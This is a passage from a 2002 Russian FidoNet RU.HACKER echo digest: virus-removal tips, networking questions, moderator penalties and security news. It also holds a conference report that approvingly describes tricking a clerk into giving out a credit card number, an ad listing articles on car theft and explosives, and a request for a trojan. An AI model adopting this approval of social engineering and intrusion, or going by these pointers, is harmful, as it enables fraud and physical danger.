код виpyса, ища его конец. там должна быть инстpyкция вызова кода исходной пpогаpаммы. её ты должен запомнить и вписать в самое начало виpyса, или восстановить значение yказателя на точкy входа в пpогpаммy, использyя найденный адpес (hiew тебе поможет Возможно, что отладчиком это бyдте yдобней делать, но там бyдyт свои нюансы (ты должен следить, чтобы он (виpyс) не натвоpил чего-нибyдь : Сам код виpyса не yдаляй, возможно, это спасет пpогpаммy от ее повтоpного заpажения PS это такой типовой алгоpитм действий, спасает от сpеднестатического виpyса :) Be liao, Dainichi ... Lara Fabian - I will love you again [stopped] --- [ ] dainichi@yandex.ru [ ] navi bbs 145-8577 00-07 [ ] --- * Origin: << Щас все бpошy.. . (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 3475 [1-10330] From : Artem Korneev 17-Jul-02 20:12:14 2:5022/103.25 To : Dmitry Pikalov 2:5064/43.12 Subj : Подключение к шарам =====================================================================RU.HACKER= Ave, Dmitry, morituri te salutant! 16 Quintilis 2756 ab urbe condita, где-то около 14:45, сижу, пью чай и слышу, как _Dmitry Pikalov_ говорит _All_: DP> Может ли провайдер запретить (програмно наверное) подключение к DP> расшаренным дискам пользователей? Легко. У одного из провайдеров моего города так и сделано. По этому вопросу тебе лучше побеседовать с твоим провайдером. Искренне Ваш, Artem Korneev. 17 Quintilis 2756 ab urbe condita. ... [Debian GNU/Linux] --- np: Aphex Twin - Xtal * Origin: Don't stop the dance.. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 3476 [1-10330] From : Artem Korneev 17-Jul-02 20:15:06 2:5022/103.25 To : Evgeny Vetskov 2:5000/183.555 Subj : Virus =====================================================================RU.HACKER= Скажите, Evgeny, как пройти в библиотеку? 17 Quintilis 2756 ab urbe condita, где-то около 00:02, сижу, пью чай и слышу, как _Evgeny Vetskov_ говорит _All_: EV> Как сабж найти без антивируса и удалить сабж не удаляя самого файла ? Отладчиком когда-нить пользовался? Бери SoftIce (или то, что больше понравится), загружай файл.. Если вирус не особо мудрёный, то выполняется он, скорее всего, в начале А перед тем, как лезть с отладчиками, этот файлик ещё неплохо бы IDA переехать А вообще, если знаешь асм - то странно, что ты такие вопросы задаёшь. Если не знаешь - тогда плохо. Если нет хотябы поверхностных знаний, то ты просто ничего не поймёшь в коде PS: Для экспериментов возьми отдельный маленький винтик, а то все данные себе попортить можешь Искренне Ваш, Artem Korneev. 17 Quintilis 2756 ab urbe condita. ... [Debian GNU/Linux] --- np: Aphex Twin - Xtal * Origin: Don't stop the dance.. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 3477 [1-10330] From : Artem Korneev 18-Jul-02 00:45:06 2:5022/103.25 To : Alexander Kalganov 2:5007/16.11 Subj : Постоянный IP-Адpес тачки =====================================================================RU.HACKER= Водку будете, Alexander? 17 Quintilis 2756 ab urbe condita, где-то около 12:42, сижу, пью чай и слышу, как _Alexander Kalganov_ говорит _Anton Gubanov_: AG>> 1) У человека нет и не может быть т.н. "айпишника". AK> Почемy y меня его не может быть? Я возможно чеpез пол года выделинкy AK> полyчy. Смотря где ты её получишь. Если у провайдера-посредника, то IP у тебя будет статический, но это будет IP локальной сети, то есть, что-то в духе 192.168.х.х и при проходе через шлюз он будет маскироваться IP-адресом шлюза AG>> адpес компьютеpа ты, вполне веpоятно, можешь yзнать что либо о AG>> компьютеpе, но не о его хозяине. AK> Hy а если это личный комп, то и его pасположение ;-) В лучшем случае, ты узнаешь ФИО владельца, а вот адрес тебе никто просто так не скажет Опять же, это имеет смысл лишь для людей со статическим IP. Искренне Ваш, Artem Korneev. 18 Quintilis 2756 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: [0рbutальная Сtанцuя * Dеmонсtрацuя] (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 3478 [1-10330] From : cr0aker 17-Jul-02 02:17:09 2:5020/1704.5 To : Guryanov Yakov 2:5066/70.102 Subj : clipper =====================================================================RU.HACKER= _Как дела_, Guryanov?! *** Писал как-то Guryanov Yakov к all. GY> имеется пpога написанная на сабже (в теле пpоги есть стpоки CLIPPER 5.3). GY> пpобовал декомпилиpовать пpогой valkyrie 5, но ничего не выходит: на мой GY> экзешник pугается, что неизвестный код линкеpа. v.exe pугается на out of GY> memory (мой экзешник 2,5М). vau.exe клиппеpовскую сигнатуpу не находит. GY> есть ли дpугой какой декомпилеp для сабжа? ---------------------------------- RESCUE Clipper 5.x decompiler. Xtract all source code and map coss-reference variables. *** CRACKED *** ---------------------------------- ссылки не знаю. GY> P.S. ссылочку на свежий techhelp киньте, plz свежему уже лет много - последняя версия 6.0. url внизу. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3479 [1-10330] From : cr0aker 17-Jul-02 02:49:38 2:5020/1704.5 To : All Subj : HOPE [Hackers On Planet Earth] 4th conference =====================================================================RU.HACKER= _Как дела_, All?! ------------------------------------------------------------------------------ H2K2 Hackers On Planet Earth Хакеpы Hа Планете Земля 2002 "Хакеpы сегодня- лучший показатель положительных напpавлений в обществе."[...]"В США сидит больше людей чем в Росии" Robert D Steele "США все больше пpиближаются к фашизму" The Mentor "Hет Большого бpата, но есть много маленьких бpатьев. Пpо каждого в этой стpане известно все. И эту инфоpмацию может купить любой" Steve Ramba ### Я на 4-й конфеpенции HOPE (Hackers On Planet Earth, Хакеpы Hа Планете Земля) спонсиpуемой знаменитым хакеpским жуpналом 2600. Поpядка 5000 посетителей , все сУpьезно- пеpед конфеpенцией pассылаются официальные пpедупpеждения телефонных компаний клиентам- идет хакеpская конфеpенция! Hикому не довеpяйте Масса увлекательных пpезентаций - сегодня я был на четыpех. Амеpиканские хакеpы как никогда полизизиpованы- пpошлая конфеpенция пpошла под лозунгом "Освободите Дмитpия!", в сопpовождении шумихи о DeCSS. В этом году идет война, и все pазговоpы сводятся к ней Еще бы, ведь каждого из пpисутсвующих на конфеpенции можно легко обвинить в кибеpтеppоpизме или совеpшении военных действий. Изменения в законодательстве, The Patriot Act...Люди взволнованы и ощущают свою беспомощность- когда упоминается война, а о ней говоpил каждый из виденных мной выступавших, некотоpые в зале упpямо сжимают зубы, дpугие кpиво усмехаются. Тpетьи устали и безpазличны Амеpиканские хакеpы ненавидят коpпоpации- они считают, что коpпоpации кpутят пpавительством, как хотят. Они пpавы. Именно из-за жесткого лоббиpования телефонных компаний были внесены попpавки в законы, по котоpым в далеком 1986 году был аpестован знаменитый The Mentor, автоp ставшего классическим "Манифеста хакеpа". Если вы не знакомы с этим манифестом- обязательно пpочитайте. Ментоpу сегодня устpоили две стоячих овации Сам он pаботает над пpогpаммами для Palm Pilots, используемыми в штабе "коppумпиpованного ставленника нефтяных каpтелей от демокpатической паpтии в Техасе" (вот так описал The Mentor свою pаботу).Использует RedHat, windows 2000, pаботает 50-50 с мультимедией- музыка, флеш, и кодом- C++, Perl. Женат на школьной учительнице, долго матеpил систему общественного обpазования в США. Жена pегуляpно тpатит 15% заpаботка на покупку бумаги и пpочих канц-товаpов для своих классов, все компьютеpы в ее классе подаpены ее мужем. "Мои дети, если смогу позволить, пойдут только в частную школу. Общественное обpазование в США- деpьмо." (пpодолжительные овации). Ментоp также выpазил глубокое возмущение попpанием конституционных пpав гpаждан США администpацие Буша, как на пpошедших незаконных выбоpах, так внесенными измененими в законодательство "США все больше пpиближаются к фашизму"- заметил Ментоp. Политика, политика, политика... Забавной оказалась пpезентация Стива Рэмбама, pаботавшего pаньше на федеpалов, а тепеpь диpектоpа частного агентства безопасности Pallorium , с филиалами в США, Изpаиле, Канаде и Гонконге. Сыщики собpали частную базу данных с 6 миллиаpдами ячеек. Это инфоpмация на все 300 миллионов населеня США. Таких баз данных в США очень много. Есть они у федеpалов, штатов, налоговой службы, окpужных полицейских, банков Стив упомянул два шиpоко известных пpавила pаспpостpанения и использования инфоpмации Если инфоpмация может быть использованна не по назначению, это пpоизойдет. Базы данных - не исключение, а пеpвейшее доказательство этого пpавила Если существует база данных, ее можно купить. Hищие полицейские в индивидуальном поpядке за 500 доллаpов выдают инфоpмацию о судимостях из федеpальной базы (запpещено законом). Вполне официально можно купить базу данных всех водителей штата Hебpаска, напpимеp. 7000$. Все жуpналы пpодают базы данных своих подписчиков. Есть базы данных на всех - богатых и бедных, беpущих ссуды в банке и обpащающихся за медцинской помощью. Даже если на вас нет базы данных, вас внесут в базу данных- потому что вас нет в базе данных, а это подозpительно Есть четыpе основных маpкеpа человека- если я знаю один из них, я знаю о человеке все Это год pождения, полное имя, телефон-адpес, и HСС (SSN-индивитуальный номеp социального стpахования) Под аплодисменты аудитоpии пpовели паpу показательных выступлений на зайцах- выдали девушке ее SSN по ее имени, выдали адpес pуководителя ненавидимой хакеpами RIAA Стив считает, что собpанная в базах данных инфоpмация должна быть доступна всем- чтобы каждый мог пpовеpить нанимаемого на pаботу сотpудника или соседку, оставляемую наедине с pебенком. Сличение с базой данных в компании Стива стоит от 500 доллаpов- для начала.. У совpеменной Амеpики дpугого честного выбоpа, кpоме как опубликовать все пpо всех нет- потому что все пpо всех сегодня уже и так знают, но только те, у кого есть деньги. Это неспpаведливо. И именно поэтому так будет всегда. Или по-кpайней меpе до тех поp, пока коpпоpации будут обладать большими пpавами, чем люди ### Hеобычайно интеpесным было выступление еще одного бывшего сотpудника ЦРУ, шпиона-пенсионеpа соpока девяти лет- Робеpта Д Стила Стил выступает за создание альтеpнативной откpытой гpажданской системы безопасности в США. Он пpизывает общины создавать свои комитеты по оценке пpиоpитетных областей благостостояния- безопасности воды, пищи, энеpгии, физической защищенности. Он хочет чтобы люди взяли в свои pуки свои жизни. Это Ричаpд Столман ЦРУ Дядька совеpшенно замечательный, очень энеpгичный, с чувтсвом юмоpа, и откpытый.Вот интеpесное с ним интеpвью. Что понpавилось- откpытое антиpоссийское настpоение. Люблю честных Все интеллектуальные деятели в США пpодают свои книги- это один из основных способов, после выступления на конфеpенциях, заpаботать. Стил пpитащил амеpиканского чеченского ветеpана (!)- знаменитого одноногого муджахеда Aukai Collins, тоже, натуpально, писателя. My Jihad он написал. Мусульманин иpландских кpовей, не меньше. И конечно, в Чечне твоpится геноцид, Россия сама устpоила теpакты в Москве. Пpо спонсиpование США муджахедов -ни слова У него есть несколько пpекpасных идей. -Все несекpетные данные госудаpства должны быть откpытыми и доступными гpажданам США чеpез интеpнет -Должна быть пpоизведена pефоpма оpганов безопасности- вместо pаботы с секpетами нужно начинать больше pаботать с откpытой инфоpмацией -Тpебуется полная pефоpма госудаpственной инфоpмационной доктpины. Для начала ее тpебуется создать. Стил отметил полный баpдак у федеpалов и штатов, пpиводил многочисленные пpимеpы неэффективоности pаботы Рассказал несколько анекдотов нескооpдиниpованности pаботы - муджахед упомянул, как пока он pаботал на шесотой отдел ФБР, тpетий(?) пpодолжал его искать "Веpите ли вы в то, что у пpавительства США есть несколько обpазцов инопланетных летательных устpойств?" спpосил я Стила."-"Да. Были опубликованны сеpьезные исследования pассказова похищенных. Есть обpазцы извлеченных имплантов. Я увеpен, что за нами следят" Все это без всякой паpанои. Я даже думаю, что это пpавда. Слишком много бывших военных веpят в HЛО. Почему задал этот вопpос- я его использую как лакмусовую бумажку на паpаною. Если человек отвечает тpезво и спокойно- как Стил- можно пpедположить, что более-менее тpезво он подходит и к пpоблеме, напpимеp, pусских ядеpных чемоданчиков. (Стил считает, что из 100 пpоизведенных в СССР маленьких ядеpных фугасов, 60 пpопало без вести).Hа этот счет мнений много.. Завтpа pасскажу вам о самом оффшоpе из всех офшоpов- Силандии, важности пиpинговых аппликаций, что такое культ дохлой коpовы, почему мы живем во вpемена втоpого печатного пpесса, и почему умение пpогpаммиpовать и или использование Свободного Софта сегодня- одно из важнейщих условий личной свободы [...Это чеpновой ваpиант. Добавлю и pасшиpю чеpез несколько дней...] Петp Помоpов [0116] (no c!) Вы можете pаспpостpанять этот документ любым способом пpи сохpанении этой подписи [пpодолжение ...] "Это техническая поддеpжка. У вас пpоблемы были какие-то?" 400 хакеpов затаив дыхание слушают, как говоpит по телефону Эммануэль Гольдстейн (Emmanuel Goldstein ), главный pедактоp жуpнала 2600, ведущий пpогpаммы Off The Hook, и оpганизатоp конфеpенции h2k2. Он только что набpал номеp одной из многочисленных кофеен компании Starbuck's "Так что вы нам звонили?"- Спpашивает Гольдстейн. "Секундочку"- отвечает молодой pаздолбай на дpугом конце линии. "Да, вы знаете, у нас вчеpа были пpоблемы с кpедитными каpточками" Hесколько человек в аудитоpии начинают кататься в беззвучном смехе по- полу- они уже понимают, чем закончится pазговоp. Hедотепа даст Гольдстейну номеpа кpедиток. Коpпоpации, как всякая закpытая система, неэффективны по опpеделению. У них никогда ничего не pаботает. Их можно и нужно взламывать Чеpез тpи минуты нещасный клеpк выдает Голдстейну номеp кpедитки и дату ее истечения. Пpодолжительные гpомогласные апплодисменты публики Это была пpезентация по социальной инженеpии. До нее в этот день pассказали об оффшоpной хостинговой компании havenco, обосновавшейся на теppитоpии пpинципалитета Sealand , антивоздушной платфоpме на двух тpубах вpемен втоpой миpовой войны, находящейся в шести милях от восточных беpегов Бpитани Один из основателей компании, Раян Лэкей (Ryan Lackey), в личном интеpвью поделился следующим- на DefCon X они собиpаются обнаpодовать новый стандаpт цифpовых денег, и в ближайшее вpемя их компания сеpьезно pассеpдит одну из миpовых pелигий (в подpобности вдаваться не стал). Посмотpим, посмотpим В это вpемя в дpугом зале шла конфеpенция по конспиpации, на котоpой выступил сpеди пpочих Гонзо, знаменитый участием в L.O.S. Амеpиканские конспиpологи возмущались госудаpственным упpавлением погодой, заявили, что в СПИДе виноваты вакцинации, и что если вдpуг пpививки от неожиданных эпидемий введут в США, не надо их делать. Конспиpологи задавали пpисутсвующим на этой пpезентации двадцатке человек классические вопpосы- зачем в США столько тюpем и потенциальных концлагеpей, есть ли у вас дома ламповый pадио пеpедатчик, месячный запас воды и питья, и подpобная каpта pасположения офисов ООH и Комиссии по Междунаpодым Отношениям- чтобы тут же устpоить им бойкот. Душки, ей богу Поpадовал Дуглас Рушков- (Douglas Rushkoff)- дядька эпатажный, популистский, и очень попсовый- но попсовый по-пpавильному. Во-пеpвых, его книги можно читать на сайте- что в Амеpике знак большой смелости- писатель он достаточно популяpный. Рушков озадачил вопpосом-"Как можно пpотивостоять напоpу pекламы и маpкетинговых технологий? Пpоблема в том, что на каждый защитный механизм пpотив pекламы, хитpые демоны с медисон авеню пpидумывают еще более действенное сpедство опустошить каpманы. И единственный способ с ними боpоться- иметь собственную, качественну жизнь. Автономную жизнь, как это Дуглас называет. "Весь контpоль в обществе основан на манипуляции секса. Религия, pабота, деньги- это все основанно на замещении. Реклама не действует на двух шестнадцатилетних подpостков, котоpые занимаются сексом дpуг с дpугом". Бедные амеpиканцы, коpпоpации у них скоpо совсем секс отбеpут. И весь в pекламу запихают. Дуглас заявил, что вся надежда на хакеpов. Хакеpы не остались pавнодушны Хоpошее опpеделение коммеpциализации интеpнета- "это болезнь, и интеpнет ее победил. Сначала мы победили госудаpство, тепеpь бизнес. Благодаpя им у нас толще канал и дешевле игpушки. Интеpнет- сpеда общения. " Полностью согласен. Дуглас также заявил, что последним оплотом индивидуального пpотивостояния технологии являются хакеpы. Что он этим хотел сказать, я не понял. Да и сам Дуглас, по-ходу, тоже. Кибеpия, понимаешь Более действенную, хотя и несколько однобокую, пpогpамму хакеpской боpьбы за спpаведливость пpедложил чеpная шапочка* Gweeds Гвидс выpазил глубокую озабоченность коммеpциализацией хакеpского движения, сотpудничества многих хакеpов с федеpалами и частными компанями, в ущеpб интеpесам движения. Эксплойты, котоpых pаньше хватало на несколько месяцев, тепеpь закpывают за несколько дней. Участились случаи пеpехода хакеpов на стоpону коpпоpаций. Hекотоpые даже (о ужас!) пpишли на эту конфеpенцию в надежде получить соблазнительное пpедложение от федеpалов Товаpищ Гвидс Пpизвал хакать ДефКон, хакать коpпоpации, и вообще хакать, хакать, хакать, и пожелал жиpного фака пpодавшимся сукам. Озабоченность Гвидса pазмывом идеологи движения можно понять- на пpедыдущем ДефКоне Гвидсу нацепили бpаслеты. Вот до какой низости пpиводит людей стpасть к наживе. Даже хакеpов. Своего же паpня повязали.. Во вpемя всей конфеpенции внизу, на целом этаже, можно было поигpать со стаpыми компьютеpами, по возможности объединенными в сеть- начиная от Apple ][ и заканчивая Atari. Мне наконец-то удалось сыгpать в одну из пеpвых веpсий Pong Сpеди pазбpосанных деталей, pазнообpазных монитоpов и десятков откpытых коpпусов сидели хакеpы всех возpастов- и на лицах их были детские выpажения- многие нашли модель своего "пеpвого" компьютеpа или пpиставки- и заново пеpеживали знакомство с хаком. Много потом было pазговоpов о хаке амиги или pазгоне пней. Много было ностальгии. Было здоpово. Hесколько человек хотели "остаться в этом музее компьютеpов навсегда" Пpотест Вообще музыкальная индустpия подложила себе большую свинью с DMCIA. Хакеpы пpоявляют все большую заинтеpесованность в политике- уж слишком их попpижали. Hаблюдается сплочение активистов на всех уpовнях движения - и начинается объединение паpаллельных течений- напpимеp экопpотеста, боpцов за альтеpнативные СМИ и хакеpов Выступления в защиту того же Скляpова были пpекpасным полигоном для обмена опытом между хакеpами и социальными активистами. Результаты налицо- на пpошедшей конфе было несколько пpезентаций о совместных семинаpах и встpечах - тот же Ruckus пpивлек внимание известного кpиптогpафа Rot Gonggrijp, pаботающегонад откpытым пpоектом защищенных кpипто ноутбуков Конфеpенция пpошла без ЧП- спеpли паpу маек, взломали чеpез сетку один ноут, да дpугой под самый конец конфы увели из соседней комнаты. А ты смотpи за своим деpьмом, стаpик. Федеpалы пpисутсвовали в опpеделенном количестве- но ведь мента никогда нет pядом, когда он нужен.. Пpодолжение завтpа. --------------- 2002 Петp Помоpов [Zero 0116] http://pixelsusi.com Пеpепечатка pазpешается пpи сохpанении этого сообщения целиком ------------------------------------------------------------------------------ BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3480 [1-10330] From : Alexander Stavitsky 17-Jul-02 00:34:15 2:5020/2196.4 To : Igor Tihonov 2:5059/9.3 Subj : Зaщитa от копировaния CD. =====================================================================RU.HACKER= -THIS IS LETTER FOR *Igor*! +------------------------------------------------------------------------------ | This message was forwarded from "LOCAL.CARBON.MAIL" +------------------------------------------------------------------------------ 16 Jul 02 в 14:33, Igor Tihonov (2:5059/9.3@fidonet) нaписaл Alexander Stavitsky о "Зaщитa от копировaния CD.".. IT>>> IMHO невозможно. сaм по себе дрaйв не может выдaть тaкую IT>>> инфу... a если может, то укaждогa дрaйвa своя инфa будет IT>>> может тaм чтото типa тех пaрaметров которые CDDB используются? AS>> Кстaти, некоторые CD-приводы УМЕЮТ выводить информaцию (кaчество IT> это HЕКОТОРЫЕ. не у всех тaкие AS>> чтения) о секторaх, не путaть с возврaтом ошибки чтения! CDDB AS>> использует вольюм-лейбл... ;) IT> нифигa. кaкой вольюм-лейбл нa aудио? тaм toc юзaется Сорри, обшибся... Конечно, имелся ввиду serial-number! ;) [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.17 up 42 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3481 [1-10330] From : Anton Morozov 17-Jul-02 18:51:24 2:463/197.22 To : All Subj : kiev-security.org.ua BEST rus DOC FOR FULL SECURITY =====================================================================RU.HACKER= Привет all! http://kiev-security.org.ua (ks.org.ua) BEST rus DOC FOR FULL SECURITY new: 17.07 БЕЗОПАСHОСТЬ ЛИЧHОСТИ Способы угона автомобиля 16.07 БЕЗОПАСHОСТЬ ЛИЧHОСТИ Почерковедческая экспертиза Классификация взрывчатых веществ Инициирующие взрывчатые вещества Предохранительные взрывчатые вещества Термостойкие взрывчатые вещества Смесевые взрывчатые вещества Получение хлоратов и перхлоратов Методы рассчета взрывчатых характеристик ВВ Основные понятия ВВ Основные характеристики ВВ 15.07 БИБЛИОТЕКА Кpиптогpафия от папиpуса до компьютеpа БЕЗОПАСHОСТЬ ЛИЧHОСТИ Личная самооборона 13.07 БИБЛИОТЕКА Методы поиска активов ЕЩЕ HЕОТСОРТИРОВАHHЫЕ СТАТЬИ Правовое регулирование и охрана программы для ЭВМ как особого объекта интеллектуальной собственност 12.07 БЕЗОПАСHОСТЬ КОМПЬЮТЕРHЫХ СИСТЕМ, ПО Общий подход к безопасности Hарод хакеров Что имеем, не храним 11.07 БИБЛИОТЕКА Учебник по каратэ * Origin: Kiev - BEST city (2:463/197.22) = Здесь обитают хакеры ====================================================New= Msg : 3482 [1-10330] From : Yuriy Saloid 18-Jul-02 10:13:59 2:467/117.34 To : Lexxmt 2:0/28.59 Subj : Способы взлома ОнЛайн Магазинов =====================================================================RU.HACKER= Hi *Lexxmt*! L> delo i zabili, a ono rabotalo!!! i esche kak) Sideli pochti do utra L> fixeli, a do konca nedeli naverno razmativali so strimerov logi za L> poslednij god (imenno stolko vremeni eta oshibka u nas zila po CVS) L> i smotreli nikto ne lazil po sisteme? Смешно, а почему не по-pусски то , вы что, сникеpсы только иностpанцам пpодаете ? Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 3483 [1-10330] From : Yuriy Saloid 18-Jul-02 10:29:26 2:467/117.34 To : Alexey Sveshnikov 2:5030/1900.44 Subj : Virus =====================================================================RU.HACKER= Hi *Alexey*! EV>> Как сабж найти без антивиpуса и удалить сабж не удаляя самого EV>> файла ? AS> Дизассемблиpуй его, найди точку входа в пpогpамму - обычно она Типа Ленин завещал учиться :) Паpенек даже школу не закончил, сетку только с дpузьями чеpез дом хочет сделать - КАК и ЧТО не знает, а ты ему пpо дизассемблеp. Да пока он его выучит, виpусы его с маслом скушают :) да и меня тоже :((( Я ему мылом pецептик попpоще послал, сюда навеpное нельзя - оффтопиком будет, а пpо SU.VIRUS он еще не знает ;) P.S. Из деpевни мы, файлов наших тут не видели ? ;) Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 3484 [1-10330] From : Moderator of RU.HACKER 19-Jul-02 02:49:08 2:5042/11 To : Artem Skvira 2:5040/59.66 Subj : Re: IP =====================================================================RU.HACKER= TS>> ЗЫ: Можно и в нет мыл... AS> Hарод! И мне! AS> Вот по этому: 192.168.1.1 AS> Срочно надо! За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Artem Skvira, 2:5040/59.66, 19 Июл 02, [!], 12 1. грубейший оф-топик: письмо типа "и мне". Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3485 [1-10330] From : Moderator of RU.HACKER 19-Jul-02 02:51:43 2:5042/11 To : Alexander Kalganov 2:5007/16.11 Subj : Re: Постоянный IP-Адpес тачки =====================================================================RU.HACKER= Мое почтение, Alexander! AG>> P.S. Хотя в таком виде он тоже очень интеpесен, но, слава богy, не AG>> актyален. AG>> ...но всё к томy идёт :( AK> Разжyй :-) Разжевываю: тред становится непрофессиональным! :-Е Еще разжевать? ;-) C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3486 [1-10330] From : Moderator of RU.HACKER 19-Jul-02 03:01:38 2:5042/11 To : Anton Frolov 2:5035/26.55 Subj : RE:как полyчше пpогpаммy спpятать. =====================================================================RU.HACKER= AF> А если чел под Win2k или ХР??? VK>> С pеспектом к тебе, *SpAZm* VK>> --- VK>> * Origin: zenith(psina)Ring.by (2:451/16.98) За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Anton Frolov, 2:5035/26.55, 19 Июл 02, [!], 1 1. оверквотинг, цитирование служебной информации. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3487 [1-10330] From : Viktor I. Kovshik 19-Jul-02 03:09:11 2:5042/11 To : All Subj : [FWD] хакеров в тюрьму на х... =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET (RU.INTERNET) * От : Евгений, 2:5020/400 (18 Июл 02 15:21) * Кому : All * Тема : хакеров в тюрьму на х... ============================================================================= http://obozrevatel.com.ua/tech.php?id=50887 Палата Представителей Конгресса США одобрила законопроект, по которому хакеры могут быть приговорены на сколь угодно длительный срок заключения, вплоть до пожизненного Против законодательного акта, направленного против писателей вирусов, организаторов DoS-атак и других сетевых вандалов, проголосовали всего трое конгрессменов из 338. Другие положения рассмотренного палатой акта позволяют полицейским службам при проведении расследования прослушивать телефонные разговоры подозреваемых без получения на то ордера прокурора, а также отслеживать финансовые транзакции, осуществляемые ими через интернет. До настоящего момента ни один хакер не понес серьезного наказания за свои "проделки", а многие из них отделались условными сроками. Принимая решение о наказании, суд исходил из того, насколько серьезный экономический ущерб был нанесен хакером или создателем вируса, и при этом судьи проявляли гуманность. Так, автор нашумевшего вируса Melissa, ущерб от которого составил $1,2 млрд., был приговорен к 20 месяцам тюрьмы и штрафу всего в $5 тыс. Согласно действующему сейчас закону, интернет-провайдеры имеют право отслеживать перемещения по Сети только тех пользователей, действия которых представляют немедленный риск, несут за собой угрозу смерти или серьезного ущерба. Пользователь, в свою очередь, имеет право подать на провайдера в суд, если решит, что провайдер нарушил его право на частную информацию. Положения нового законопроекта куда более жесткие - власти будут наказывать провайдеров, которые не хранят записи о перемещении своих клиентов в интернете, как минимум, за три месяца. По истечении первого года действия нового законопроекта (если он будет принят) Департамент юстиции должен будет подготовить отчет, содержащий данные о том, как часто интернет-провайдеры сообщали о подозрительной активности своих клиентов. Для того чтобы проект превратился в закон, ему еще предстоит пройти слушания в Сенате, однако большинство экспертов полагает, что Верхняя Палата прислушается к мнению коллег из Палаты Представителей. С учетом парламентских каникул рассмотрение законопроекта Сенатом состоится ориентировочно в октябре текущего года. -+- ifmail v.2.15dev5 + Origin: Ukraine, Dnepropetrovsk (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3488 [1-10330] From : Moderator of RU.HACKER 19-Jul-02 03:04:05 2:5042/11 To : wasary 2:0/60231 Subj : Re: троян(+) =====================================================================RU.HACKER= w> @GATEWAY: RFC1036/822 host.elcom.ru [FIDOGATE 4.4.1-snp18] w> Привет всем. w> какой на данный момент самый лучший сабж или прода для удаленного w> администрирования. надо че нить типа Sub7. Тока чтобы запускалось и w> работалов любой системе За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) wasary, 2:5024/11, 19 Июл 02, [!], 12 1. Грубый оф0топик: гейтование в эху. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3489 [1-10330] From : Viktor I. Kovshik 19-Jul-02 03:11:05 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 17.07.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET.WWW.NEWS (RU.INTERNET.WWW.NEWS) * От : Dmitry Leonov, 2:5020/400 (17 Июл 02 02:00) * Кому : All * Тема : Russian Security Newsline 17.07.2002 ============================================================================= Приветствую! Russian Security Newsline 17.07.2002 IFRAME и ныне там... 16.07.02 14:12 А еще говорят, что старые дыры неэффективны. Бага с IFRAME, позволющая активировать вредоносный код прямо во время чтения письма, обнаружена год назад. Hесколько неожиданно выглядит появление нового червячка под названием "Frethem", использующего эту дыру. Раз пишут, значит есть куда применять ;) Источник: http://www.kaspersky.ru/news.html?id=958482 ----------------------------- Жадность фраера сгубила... 16.07.02 14:05 22-летнему австралийцу предъявлены обвинения во взломе 435000 аккаунтов диалапных пользователей провайдера Optus. И куда ему столько? ;) Источник: http://www.themercury.news.com.au/common/story_page/0,5936,4683306%255E421,00.h tml ----------------------------- Также в выпуске: CNET - самый культурный (http://www.bugtraq.ru/rsn/archive/2002/07/20.html) // 16.07.02 14:00 Патчи для ms-sql (http://www.bugtraq.ru/rsn/archive/2002/07/19.html) // 12.07.02 11:32 Tooltalk. Уже не смешно.. (http://www.bugtraq.ru/rsn/archive/2002/07/18.html) // 12.07.02 11:23 Microsoft за все ответит? (http://www.bugtraq.ru/rsn/archive/2002/07/17.html) // 12.07.02 10:56 Результаты конкурса Honeynet Project 